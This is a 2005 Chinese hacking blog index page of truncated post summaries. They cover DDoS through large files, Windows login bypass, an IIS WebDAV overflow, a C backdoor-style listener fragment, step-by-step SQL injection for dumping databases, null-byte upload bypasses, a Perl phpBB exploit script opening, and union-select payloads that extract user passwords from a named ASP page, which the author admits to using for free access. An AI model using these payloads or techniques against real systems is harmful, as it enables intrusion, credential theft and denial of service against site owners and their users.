All about security

scripts.girl

导航

2005年5月12日

摘要: 如果站上放了个大文件,那就要小心了,很容易被别人DDOS,以我的影音传送带为例,现在已经是128线程了。只要线程足够大,你的站点永远无法访问。这让我想起了别的方法,比如防火墙阻挡吧,虽然LOG能记录黑客的攻击,但是当你的硬盘填满的时候,会不会还能记录LOG呢?还有一些记录SQL注入的东西,当然也是用数据库来记录的,用同样的方法,让你的数据库足够大,嘿嘿,后面的攻击就可以轻松突破了。这些当然是理论上... 阅读全文

posted @ 2005-05-12 22:01 isno's world 阅读(591) 评论(0) 推荐(0)

摘要: 老的方法我就不说了。也不实际我来说说新的吧 1 很多人没有把administrator设置密码,所以我们很容易通过administrator/""进入系统。2000 直接进去xp 按两下ctrl+alt+del就可以了2 用windows登陆密码破解器运行后装在软盘中。如果对方电脑没有软驱,我建议把自己的软驱扯下来,装到别人机器上(这样太专业了,不过没办法) 阅读全文

posted @ 2005-05-12 16:21 isno's world 阅读(1022) 评论(1) 推荐(0)

摘要: 发现一个站:www.123cha.com最近有一个查询某站的二级站点,其实就是在这里查的。里面有个“Alexa排名资料”站 Alexa 流量、访问量、页面浏览量查询  Alexa 排名是目前常引用的用来评价某一网站访问量的一个指标。事实上,Alexa 排名是根据对用户下载并安装了 Alexa Tools Bar 嵌入到 IE 等浏览器,从而监控其访问的网站数据进行统计的,因此,其排名数据并不具有绝... 阅读全文

posted @ 2005-05-12 15:51 isno's world 阅读(662) 评论(0) 推荐(0)

摘要: 今天在godexp站上看到一些被黑的站点,jp的.一看全站都是html的,而且主机上没有别的站,旁注也是不可能的而且连二级站点都没有郁闷,只有两种可能了1 ftp密码被破解2系统漏洞后来一问spirit,当时就傻了,原来是利用最新的iis5.0webdav溢出工具来的真是郁闷! 搞脚本那么久了,连基本的入侵都忘记了. 阅读全文

posted @ 2005-05-12 15:20 isno's world 阅读(601) 评论(0) 推荐(0)

摘要: #include#include #pragma comment (lib, "Ws2_32.lib")int port=1983;DWORD WINAPI ClientThread(LPVOID lpParam);void Help(){printf(" /***************************************\\\n");printf(" |This S... 阅读全文

posted @ 2005-05-12 15:16 isno's world 阅读(359) 评论(0) 推荐(0)

摘要: 前言: 说起“中间人攻击(Man-in-the-middle-attacks,简称:MITM攻击)”大家可能马上想起曾经风靡一时的SMB会话劫持,DNS欺骗等技术,这些都是典型的MITM攻击手段。其实MITM攻击说它是一种手段,不如说它是一种攻击模式,它可以应用于各个领域,比如在现实中,A通过B给C传话,那么B在传话给C的时候,可以夸大其词,也可以填油加醋后传给C,在这个过程中中间人B ... 阅读全文

posted @ 2005-05-12 15:03 isno's world 阅读(617) 评论(0) 推荐(0)

摘要: SQL Server 数据库的备份与恢复 选择操作:备份 恢复 数据库名:"> 文件路径:(备份或恢复的文件路径,备份成EXE主要为了方便下载,活活..) 0 then response.write err.number&"" response.write err.description&"" end if Response.write "备份成功!" elseif act = ... 阅读全文

posted @ 2005-05-12 15:02 isno's world 阅读(581) 评论(0) 推荐(0)

摘要: 家是温馨的 阅读全文

posted @ 2005-05-12 01:54 isno's world 阅读(486) 评论(0) 推荐(0)

摘要: 看了臭要饭写的跨库查询,我整理了一下从暴库到暴出密码等的一般 步骤,使得思路更清晰些。 SQL INJECTION 灵活多变,注入的语句不一,下面只提供暴库的一般 步骤,希望能对你有帮助。 1:暴出所有库名. http://www.***.com/***.asp?id=1 and 0(select count(*) from master.dbo.sysdatabases where... 阅读全文

posted @ 2005-05-12 01:41 isno's world 阅读(346) 评论(0) 推荐(0)

摘要: 很多站都是这样防止或是过滤ASP提交的参数的 ifisnumeric(id)Then response.write"yes!" callsql_query(id) else response.write"Errorid" Response.End endif 这样就不论怎么样,如果出现非数值就出现错误,很直接的防范,没办法出错,也没办法得到数据库类型 但是其... 阅读全文

posted @ 2005-05-12 01:40 isno's world 阅读(421) 评论(0) 推荐(0)

摘要: 来自:TNT-BSecurityTeam 这篇是我们TNT-B小组贴在dvbbs上的一篇文章! 原文见http://www.dvbbs.net/TNT-B/DVBBS.TXT可能现在已经删了!hoho 前段时间听说动网的上传再次出现了不可修复的错误,有人居然说是upload.inc有错,我仔细的读了N遍代码,可以肯定的说,upload.inc应该没有办法利用,今天无意中跑到动网的官... 阅读全文

posted @ 2005-05-12 01:40 isno's world 阅读(328) 评论(0) 推荐(0)

摘要: #!/usr/bin/perl -w use IO::Socket; ## Example: ## C:\>phpbb.pl www.site.com /phpBB2/ 2 ## ## downloads.php mod in phpBB \n"; print " e.g.: phpbb.pl www.site.com /phpBB2/ 2 \n"; print " [~... 阅读全文

posted @ 2005-05-12 01:39 isno's world 阅读(377) 评论(0) 推荐(0)

摘要: 引用:找到一点关于不要绝对路径的东西,希望讨论一下! ACCESS的跨库是通过中括号实现的,包括路径,密码设置等;跨库的前提是已经打开了一个Connection。 问题说明: 有时需要在两个或三个数据库的表中,通过相关关键字,查询获取所需记录集,用一般的SQL查询语句是实现不... 阅读全文

posted @ 2005-05-12 01:38 isno's world 阅读(462) 评论(0) 推荐(0)

摘要: 适合读者:入侵爱好者、网管 前置知识:无 脚本小子:ASP注入漏洞在国内可谓是火得不能再火了,很多大站被它搞定过。绝大多数朋友都是利用工具,或者通过手工在后面加上“AND 1=1”和“AND 1=2”,再根据返回的页面内容来判断是否存在注入漏洞的,但是有另外的注入方法却被我们忽略了。 搜索型注入成功搞定跨国电子公司 文/图 勇哥儿 大家都知道,注入方式主要有数字型和字符型,但... 阅读全文

posted @ 2005-05-12 01:36 isno's world 阅读(580) 评论(0) 推荐(0)

摘要: 四两拨千斤: 关于这个问题我不想多提,反正经过了一个晚上的测试。 (我想是应该写个文章投搞了!) 就是关于“斑主评定”栏目,当然是插件。 插件比较乱,有很多,比如前台就是 z_disadmin.asp z_disadmin_edit.asp z_disadminconn.asp 后台在data/#pingding.mdb 有的后台在data/pingding.asp 有的则在data/di... 阅读全文

posted @ 2005-05-12 01:35 isno's world 阅读(277) 评论(0) 推荐(0)

摘要: 1 asp 抓包后只要对未过滤的,比如目录名、文件名后面加个空格,并在UltraEdit中将空格的hex字符修改成00 然后再将d:\hack\mm\mm.asp修改成mm.jpg就可以了。 再用nc提交 2 php 第一处只要在修改成mm.php%00 再将d:\hack\mm\mm.php修改成mm.jpg即可 再用nc提交 3 jsp 只要将包的"Content-Type: text/p... 阅读全文

posted @ 2005-05-12 01:35 isno's world 阅读(443) 评论(0) 推荐(0)

摘要: 我前段时间写了一篇《MySQL注入中导出字段内容的研究——通过注入导出WebShell》(http://www.4ngel.net/article/37.htm),是查询数据然后在生成文件的,现在我发现其实不少PHP程序,比如IPB就是把数据处理过了,再插入数据库,一般是htmlspecialchars()之后,插入数据,所以利用该文的方法,就行不通了,即使把webshell的代码插入数据库,生成... 阅读全文

posted @ 2005-05-12 01:34 isno's world 阅读(572) 评论(0) 推荐(0)

摘要: 新漏洞,对sql和access通杀 ALLyeSNo[Godkiller Team] 漏洞处在blog.asp中:如下代码 ----------------------------------------------------------------- "" then sql="select * from [calendar] where id="&id&" order by id Desc"... 阅读全文

posted @ 2005-05-12 01:33 isno's world 阅读(917) 评论(0) 推荐(0)

摘要: 今天看到一个难题: http://www.cnnb.net.cn/lake2/Challenge/challenge.asp?id=1 (呵呵,有空大家也可以去试试自己的实力) 这个本来是不想公布的,但是不写手又痒痒,所以才写这个文章,用来自勉! 大家一定要试过后,才来看我的解答! -----------------------------秘密文件--------------------... 阅读全文

posted @ 2005-05-12 01:31 isno's world 阅读(301) 评论(0) 推荐(0)

摘要: 这个漏洞实在不想说,靠这个看了不少免费电影! 现在公布一下吧: 就是re.asp里面对id参数未过滤。 这样来利用 re.asp?id=0 union select 1,1,1 from users where oklook>=5(4,3,2,1) re.asp?id=0 union select 1,userid,password from users where oklook>=5 re.a... 阅读全文

posted @ 2005-05-12 01:29 isno's world 阅读(348) 评论(0) 推荐(0)